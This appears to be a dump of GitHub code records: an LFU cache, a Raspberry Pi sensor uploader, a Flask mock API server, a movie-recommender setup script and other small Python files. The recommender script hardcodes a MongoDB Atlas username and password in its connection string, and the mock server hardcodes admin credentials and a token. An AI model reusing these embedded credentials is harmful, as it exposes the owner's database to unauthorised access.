obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)", "repo_name": "sanafathima418/StriverSDESheet", "sub_path": "Stack/lfu_cache.py", "file_name": "lfu_cache.py", "file_ext": "py", "file_size_in_byte": 3385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 29, "usage_type": "argument"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 65, "usage_type": "argument"}]}
+{"seq_id": "41575861174", "text": "import serial \nimport threading\nimport requests\nimport time\nimport random\nimport os\nclass DeviceHandler:\n \n def __init__(self,device_id,location,baud_rate = 9600,serial_port = '/dev/ttyUSB0',server_address = 'http://127.0.0.1:3000/post-data'):\n self.baud_rate = baud_rate\n self.serial_port = serial_port\n self.server_address = server_address \n self.DeviceID = device_id\n self.Location = location\n\n try:\n self.uc = serial.Serial(self.serial_port,self.baud_rate)\n\n except:\n print(\"\\nPermission issues detected while accessing the port.\\n\\tTry running - 'sudo chmod a+rw /dev/ttyUSB0'\\n\")\n exit()\n\n def run(self):\n try:\n FetchedData = self.uc.readline()\n FetchedData = FetchedData.decode(\"utf-8\") \n\n var1,var2,var3,var4 = FetchedData.split('-')\n except:\n print('\\nHaving issues with decoding...')\n return\n\n\n data ={\n 'CO2':var1.strip(),\n 'CO':var2.strip(),\n 'CH4':var3.strip(),\n 'AIRQ':var4.strip(),\n 'DeviceID': self.DeviceID,\n 'location': self.Location\n }\n try:\n r = requests.post(self.server_address,data)\n except:\n os.system('clear')\n print('\\n\\tServer not responding...Make sure its up and running\\n\\t\\tReconnecting in 10 secs..')\n time.sleep(10)\n return\n print('\\n\\tValue Sent -> ' + str(data['CO2'])+\" \"+str(data['CO'])+\" \"+str(data['CH4'])) \n\n\n\nif __name__ == \"__main__\":\n \n handler = DeviceHandler(device_id = 'JAGAT2019',location = 'Jagatpura')\n \n while True:\n handler.run()\n time.sleep(10)\n", "repo_name": "mayankt28/YU", "sub_path": "RPi-Code/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "serial.Serial", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 43, "usage_type": "call"}, {"api_name": "os.system", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "15201616342", "text": "#!/usr/bin/env python\n#\n# This file is part of cpu_cores released under the MIT license.\n# See the LICENSE file for more information.\n\nfrom setuptools import setup, find_packages\nimport cpu_cores\n\nDESCRIPTION = \"cpu_cores-py is a small python library to get the number of\" +\\\n \"'real physical' cpu cores of a linux/osx box\"\ntry:\n with open('PIP.rst') as f:\n LONG_DESCRIPTION = f.read()\nexcept IOError:\n LONG_DESCRIPTION = DESCRIPTION\n\nwith open('pip-requirements.txt') as reqs:\n install_requires = [\n line for line in reqs.read().split('\\n') if (line and not\n line.startswith('--'))]\n\nsetup(\n name='cpu_cores',\n version=cpu_cores.__version__,\n author=\"Fabien MARTY\",\n author_email=\"fabien.marty@gmail.com\",\n url=\"https://github.com/thefab/cpu_cores\",\n packages=find_packages(),\n license='MIT',\n download_url='https://github.com/thefab/cpu_cores',\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n scripts=[\"scripts/get_cpu_physical_cores.py\"],\n install_requires=install_requires,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Utilities',\n 'Topic :: System :: Hardware',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development',\n ]\n)\n", "repo_name": "thefab/cpu_cores", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "cpu_cores.__version__", "line_number": 24, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "32379609335", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'dns_records'\nurlpatterns = [\n path('', views.DnsRecordListView.as_view(), name='list'),\n path('export/', views.ZoneExportView.as_view(), name='zone_export'),\n path('import/', views.ZoneImportView.as_view(), name='zone_import'),\n path('create/', views.DnsRecordCreateView.as_view(), name='create'),\n path('/', views.DnsRecordDetailView.as_view(), name='detail'),\n path('/update/', views.DnsRecordUpdateView.as_view(), name='update'),\n path('/delete/', views.DnsRecordDeleteView.as_view(), name='delete'),\n]\n", "repo_name": "sjy5386/flare-core", "sub_path": "records/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "18224127194", "text": "# author: @iamtienng\n# import tools for saving model in database\nimport pickle\n\n# import tools for machine learning model\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n# import machine learning model\nfrom recommendation_system.matrix_factorization import MatrixFactorization\n\n# import tools for database\nfrom pymongo import MongoClient\nimport bson\n\n# connect to the database\n# usernameDB = \"iamtienng\"\n# passwordDB = \"d4O8CmCGCeCI8vzA\"\nclient = MongoClient(\n 'mongodb+srv://iamtienng:d4O8CmCGCeCI8vzA@mrsbbdb.wqcrinp.mongodb.net/?retryWrites=true&w=majority')\n# localhost\n# client = MongoClient(\"localhost\", 27017)\ndb = client[\"MRSBBDB\"]\n# YOU MUST import ratings through MongoDBCompass\n# YOU MUST import movies through MongoDBCompass\n\n# load models for mfcf model if the model does not exist in the database\nW = np.asarray([])\nX = np.asarray([])\nd = np.asarray([])\nb = np.asarray([])\nif len(list(db[\"model\"].find())) == 0:\n W = np.loadtxt('./data/W.csv', delimiter=',')\n X = np.loadtxt('./data/X.csv', delimiter=',')\n d = np.loadtxt('./data/d.csv', delimiter=',')\n b = np.loadtxt('./data/b.csv', delimiter=',')\n\n wf = {\"name\": \"W\", \"value\": bson.Binary(pickle.dumps(W, protocol=2))}\n xf = {\"name\": \"X\", \"value\": bson.Binary(pickle.dumps(X, protocol=2))}\n df = {\"name\": \"d\", \"value\": d.tolist()}\n bf = {\"name\": \"b\", \"value\": b.tolist()}\n\n db[\"model\"].insert_one(wf)\n db[\"model\"].insert_one(xf)\n db[\"model\"].insert_one(df)\n db[\"model\"].insert_one(bf)\nelse:\n for model in db[\"model\"].find():\n if model['name'] == \"W\":\n W = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"X\":\n X = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"d\":\n d = np.asarray(model['value'])\n elif model['name'] == \"b\":\n b = np.asarray(model['value'])\n\n# load all ratings as utility matrix for mfcf model\nratings_cursor = db['rating'].find()\nratings_dataframe = pd.DataFrame(list(ratings_cursor), columns=[\n 'userId', 'movieId', 'rating', 'timestamp']).astype({'userId': int, 'movieId': int, 'rating': int, })\nratings_matrix = np.asmatrix(ratings_dataframe)\nrate_train, rate_test = train_test_split(\n ratings_matrix, test_size=0.2, random_state=10)\n\n# mfcf machine learning model\nmfcf_model = MatrixFactorization(\n Y=ratings_matrix, K=50, lam=.01, Xinit=X, Winit=W, bInit=b, dInit=d, learning_rate=50, max_iter=30)\n", "repo_name": "iamtienng/movie-recommendation-system", "sub_path": "mrsbb/BackEnd/mrsbb-be/extensions.py", "file_name": "extensions.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymongo.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 39, "usage_type": "call"}, 
{"api_name": "pickle.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 51, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.asmatrix", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "recommendation_system.matrix_factorization.MatrixFactorization", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "20852606899", "text": "from flask import Flask, request\nimport flask\nfrom flask.globals import session\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom werkzeug.datastructures import Accept\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime, date\nimport xmltodict\nimport random\nimport base64\nimport json\nimport ipaddress\n\napp = Flask(__name__)\nauth = HTTPBasicAuth()\nbearer = HTTPTokenAuth(scheme='Bearer')\n\njson_data = {\n \"response\": {\n \"status\": \"success\",\n \"name\": \"http mock server\",\n \"date\": date.today(),\n \"time\": datetime.now().strftime(\"%H:%M:%S\"),\n \"details\": {\n \"id\": \"12345\",\n \"name\": \"dummy data\",\n \"description\": \"ubot testing for generic http servers\"\n },\n \"data\": []\n }\n}\n\nid = 3896\n\nxml_data = xmltodict.unparse(json_data, pretty=True)\n\nusers = {\n 'admin': generate_password_hash('admin')\n}\n\ntokens = dict()\nsessions = dict()\nallocated = dict()\n\n@auth.verify_password\ndef verify_password(username, password):\n if username in users and check_password_hash(users.get(username), password):\n return username\n\n@bearer.verify_token\ndef verify_token(token):\n if token in tokens:\n return tokens[token]\n\n@app.route('/', methods=['GET'])\ndef get_endpoints():\n ep_dict = {\n 'endpoints': {\n 'GET': '/api/v1/get_data',\n 'POST': '/api/v1/post_data',\n 'PUT': '/api/v1/modify_data',\n 'PATCH': '/api/v1/modify_data',\n 'DELETE': '/api/v1/remove_data',\n 'HEAD': '/api/v1/head',\n 'RESET': '/api/v1/reset_data',\n 'TEST TOKEN': '/token-auth',\n 'GET TOKEN (header)': '/api/v1/get-token',\n 'GET TOKEN': '/api/v2/get_token',\n 'GET SESSION': '/api/v2/get_session',\n 'ALLOCATE': '/api/v2/allocate',\n 'DEALLOVATE': '/api/v2/deallocate'\n }\n }\n if request.headers.get('accept') == 'application/xml':\n return xmltodict.unparse(ep_dict, pretty=True), 200\n else:\n return ep_dict, 200\n\n\ndef print_globals(task):\n print(\"-------------------\", task, \"--------------------\")\n print(\"tokens: \", tokens)\n print(\"sessions: \", sessions)\n print(\"allocated: \", allocated)\n print(\"-------------------------------------------------\")\n\n@app.route('/api/v2/get_token', methods=['POST'])\ndef get_access_token():\n global tokens\n data = json.loads(request.get_data().decode())\n username = data.get('user')\n num = random.randint(10000, 99999)\n tm = datetime.now()\n token_string = f'{tm}{username}{num}'\n token = base64.b64encode(token_string.encode()).decode()\n tokens[token] = username\n return f'\"token\": \"{token}\"', 200\n\n\n@app.route('/api/v2/get_session', methods=['POST'])\ndef get_session():\n global sessions\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n if token not in tokens:\n return \"Invalid token\", 400\n session_id = random.randint(20124, 99999)\n sessions[session_id] = token\n return f'\"session-id\": \"{session_id}\"', 200\n\n\n@app.route('/api/v2/allocate', methods=['POST'])\ndef allocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n subnet = data.get('subnet')\n network = ipaddress.ip_network(subnet)\n for add in network.hosts():\n if add not in allocated.values():\n allocated[int(session)] = add\n return f'\"ip-address\": \"{add}\"', 200\n return 'no address available', 
@app.route('/api/v2/deallocate', methods=['POST'])\ndef deallocate():\n    data = json.loads(request.get_data().decode())\n    token = data.get('token')\n    session = data.get('session')\n    if int(session) not in sessions:\n        return \"Invalid session id\", 400\n    if sessions.get(int(session)) != token:\n        return \"Invalid token\", 400\n    if int(session) in allocated:\n        del allocated[int(session)]\n    return \"Deallocated\", 200\n\n\n@app.route('/api/v1/get_data', methods=['GET'])\ndef get_data():\n    try:\n        accept = request.headers.get('accept')\n        if accept == 'application/xml':\n            xml_data = xmltodict.unparse(json_data, pretty=True)\n            return xml_data, 200\n        else:\n            return json_data, 200\n    except Exception as e:\n        return f\"{e}\", 500\n\n@app.route('/api/v1/get_data/<id>', methods=['GET'])\ndef get_data_by_id(id):\n    try:\n        print(id)\n        final_data = {\n            \"msg\": \"no data found\"\n        }\n        data = json_data.get('response').get('data')\n        for d in data:\n            print(d.get('id'))\n            if d.get('id') and str(d.get('id')) == id:\n                final_data = d\n        accept = request.headers.get('accept')\n        if accept == 'application/xml':\n            return xmltodict.unparse(final_data, pretty=True), 200\n        else:\n            return final_data, 200\n    except Exception as e:\n        return f\"{e}\", 500\n\n\ndef update(success_code):\n    global id\n    try:\n        data = None\n        content_type = request.headers.get('Content-Type')\n        print(content_type)\n        if content_type == 'application/json':\n            data = request.get_json()\n            data['id'] = id\n            id = id+1\n            input_type = 'json'\n        elif content_type == 'application/xml':\n            data = request.get_data().decode()\n            try:\n                data_dict = xmltodict.parse(data)\n                data = xmltodict.unparse(data_dict, pretty=True)\n                input_type = 'xml'\n            except Exception as e:\n                return {\n                    'status': 'failure',\n                    'msg': f'invalid xml: {e}'\n                }, 400\n        elif content_type == 'application/x-www-form-urlencoded':\n            print('step-1')\n            data = request.form\n            print(data)\n            input_type = 'form data'\n        elif 'multipart/form-data' in content_type:\n            data = request.form\n            files = request.files\n            print(files)\n            input_type = 'multipart form data'\n        else:\n            data = request.get_data().decode()\n            input_type = 'raw data'\n        if data is not None and data != \"\":\n            try:\n                json_data['response']['data'].append(data)\n            except Exception as e:\n                pass\n            finally:\n                return {\n                    'status': 'success',\n                    'msg': 'valid input',\n                    'input-type': input_type,\n                    'input': data\n                }, success_code\n        else:\n            return {\n                'status': 'success',\n                'msg': 'input is None'\n            }, success_code\n    except Exception as e:\n        print(e)\n        return {\n            'status': 'failure',\n            'msg': f'{e}'\n        }, 500\n\n@app.route('/api/v1/create_data', methods=['POST'])\ndef post_data():\n    return update(201)\n\n\n@app.route('/api/v1/modify_data/<id>', methods=['PUT', 'PATCH'])\ndef put_data(id):\n    return update(202)\n\n@app.route('/api/v1/reset_data', methods=['POST'])\ndef reset():\n    json_data['response']['data'] = []\n    return \"\", 204\n\n\n@app.route('/api/v1/remove_data', methods=['DELETE'])\ndef delete_data():\n    try:\n        data = \"\"\n        if len(request.args.to_dict().keys()) != 0:\n            for key in request.args.keys():\n                data = f'{data}{key}={request.args.get(key)} '\n            return {\n                'status': 'success',\n                'msg': f'Data deleted for {data}'\n            }, 202\n        elif request.get_data().decode() != \"\":\n            data = request.get_data().decode()\n            if request.headers['content-type'] == 'application/json':\n                data = json.loads(data)\n            return {\n                'status': 'success',\n                'msg': f'Data deleted for {data}'\n            }, 202\n        else:\n            return \"\", 204\n    except Exception as e:\n        return {\n            'status': 'failure',\n            
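# include the exception text so the client can see why the delete failed\n            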
'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/head', methods=['HEAD'])\ndef head():\n return {\"content\": \"some content\"}, 202\n\n@app.route('/api/v1/get-token', methods=['GET'])\n@auth.login_required\ndef get_token():\n global tokens\n username = auth.username()\n token = 'MjAyMS0wOS0yOCAwNTozNTo1Mi44MDg1NTNhZG1pbjQzNzM0'\n tokens[token] = username\n response = flask.Response()\n print(token)\n response.headers['Access-token'] = token\n return response\n\n@app.route('/token-auth', methods=['GET'])\n@bearer.login_required\ndef test_token_auth():\n return f\"welcome {bearer.current_user()}\", 200\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)", "repo_name": "shiv6/mock-server", "sub_path": "mock_server.py", "file_name": "mock_server.py", "file_ext": "py", "file_size_in_byte": 8970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPBasicAuth", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPTokenAuth", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 35, "usage_type": "call"}, {"api_name": "werkzeug.security.generate_password_hash", "line_number": 38, "usage_type": "call"}, {"api_name": "werkzeug.security.check_password_hash", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 75, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 95, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 117, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 119, "usage_type": "argument"}, {"api_name": "ipaddress.ip_network", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.globals.session", "line_number": 125, "usage_type": "argument"}, 
{"api_name": "json.loads", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 135, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 137, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 139, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 140, "usage_type": "argument"}, {"api_name": "flask.request.headers.get", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 184, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "xmltodict.parse", "line_number": 191, "usage_type": "call"}, {"api_name": "xmltodict.unparse", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 201, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 206, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 210, "usage_type": "name"}, {"api_name": "flask.request.args.to_dict", "line_number": 255, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 255, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.request.args.keys", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 262, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 263, 
"usage_type": "call"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 264, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 289, "usage_type": "call"}]}
+{"seq_id": "4559228483", "text": "#!/usr/bin/env python3\n\"\"\"Tests signal filtering.\"\"\"\n# Python imports\nimport sys\nimport random\n\n# Dependency imports\nimport numpy as np\nimport pyqtgraph as pg\n\n# Package imports\nfrom .. import signal\n\ndef square_wave(length, gaussian_noisiness=2, salt_pepper_noisiness=2, amplitude=100):\n \"\"\"Returns a noisy square wave signal.\n High values have gaussian noise, while low values have salt-and-pepper noise.\n \"\"\"\n i = 0\n while i < length:\n for _ in range(0, 50):\n yield (i, 0 + random.gauss(0, gaussian_noisiness))\n i = i + 1\n for _ in range(0, 50):\n yield (i, amplitude * (random.randint(0, amplitude - 1) > salt_pepper_noisiness))\n i = i + 1\ndef sine_wave(length, gaussian_noisiness=2, amplitude=50):\n \"\"\"Returns a noisy sine wave signal with gaussian noise.\"\"\"\n i = 0\n sample_points = np.linspace(0.0, 2 * np.pi, num=length)\n wave = amplitude * (1 + np.sin(2 * np.pi * sample_points))\n for i in range(0, length):\n yield (i, wave[i] + random.gauss(0, gaussian_noisiness))\n\ndef stream(signal_generator):\n \"\"\"Continuously generates noisy data and filters it, then plots the results.\"\"\"\n signal_length = 500\n filterer = signal.moving_filter(10)\n\n # Plotting\n signal_x = []\n signal_y = []\n filtered_x = []\n filtered_y = []\n\n for (sample_number, sample) in signal_generator(signal_length):\n signal_x.append(sample_number)\n signal_y.append(sample)\n filtered = filterer.send((sample_number, sample))\n if filtered is not None:\n filtered_x.append(filtered[0])\n filtered_y.append(filtered[1])\n\n graph = pg.plot()\n graph.addLegend()\n graph.plot(signal_x, signal_y, pen='r', name=\"Raw (Noisy) Signal\")\n graph.plot(filtered_x, filtered_y, pen='b', name=\"Filtered Signal\")\n\nif __name__ == \"__main__\":\n pg.setConfigOptions(antialias=True, background='w', foreground='k')\n stream(square_wave)\n stream(sine_wave)\n sys.exit(pg.Qt.QtGui.QApplication.instance().exec_())\n", "repo_name": "ethanjli/vera-sleeve", "sub_path": "verasleeve/tests/signal_filtering.py", "file_name": "signal_filtering.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.gauss", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "random.gauss", "line_number": 32, "usage_type": "call"}, {"api_name": "pyqtgraph.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "pyqtgraph.setConfigOptions", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt.QtGui.QApplication.instance", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt", "line_number": 62, "usage_type": "attribute"}]}
+{"seq_id": "12326641246", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom datetime import date, datetime\n\nif __name__ == '__main__':\n # Список работников.\n people = []\n\n # Организовать бесконечный цикл запроса команд.\n while True:\n # Запрос команды\n command = input(\">>> \").lower()\n\n # Выполнить действие в соответствие с командой.\n if command == 'exit':\n break\n\n elif command == 'add':\n # Запросить данные о работнике.\n name = input(\"Фамилия и инициалы? \")\n post = input(\"Телефон? \")\n #year = input(\"Дата рождения? \")\n\n #year = date(int(year[2]), int(year[1]), int(year[0]))\n year = input(\"Введите дату рождения (гггг.мм.дд): \")\n year = year.split(\".\")\n year = date(int(year[0]), int(year[1]), int(year[2]))\n\n\n # Создать словарь.\n man = {\n 'name': name,\n 'tel': post,\n 'date': year,\n }\n\n # Добавить словарь в список.\n people.append(man)\n # Отсортировать список в случае необходимости.\n if len(people) > 1:\n people.sort(key=lambda item: item.get('tel', ''))\n\n elif command == 'list':\n # Заголовок таблицы.\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 20\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^20} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n\n # Вывести данные о всех сотрудниках.\n for idx, man in enumerate(people, 1):\n print(\n '| {:>4} | {:<30} | {:<20} | {:>20} |'.format(\n idx,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', ''))\n )\n )\n print(line)\n\n elif command.startswith('select'):\n\n # Разбить команду на части.\n parts = command.split(' ', maxsplit=1)\n # Получить имя.\n period = parts[1]\n count = 0\n # Проверить сведения работников из списка.\n for man in people:\n if man.get('name', period).lower() == period.lower():\n count += 1\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 12\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^12} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n print(\n '| {:>4} | {:<30} | {:<20} | {:>12} |'.format(\n count,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', 0))\n )\n )\n print(line)\n\n\n # Если счетчик равен 0, то работники не найдены.\n if count == 0:\n print(\"Люди с заданным именем не найдены.\")\n\n elif command == 'help':\n # Вывести справку о работе с программой.\n print(\"Список команд:\\n\")\n print(\"add - добавить человека;\")\n print(\"list - вывести список людей;\")\n print(\"select <имя> - запросить людей с этим именем;\")\n print(\"help - отобразить справку;\")\n print(\"exit - завершить работу с программой.\")\n\n else:\n print(f\"Неизвестная команда {command}\", file=sys.stderr)\n", "repo_name": "AndrejMirrox/labor-9", "sub_path": "PyCharm/Individual.py", "file_name": "Individual.py", "file_ext": "py", "file_size_in_byte": 4802, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 128, "usage_type": "attribute"}]}
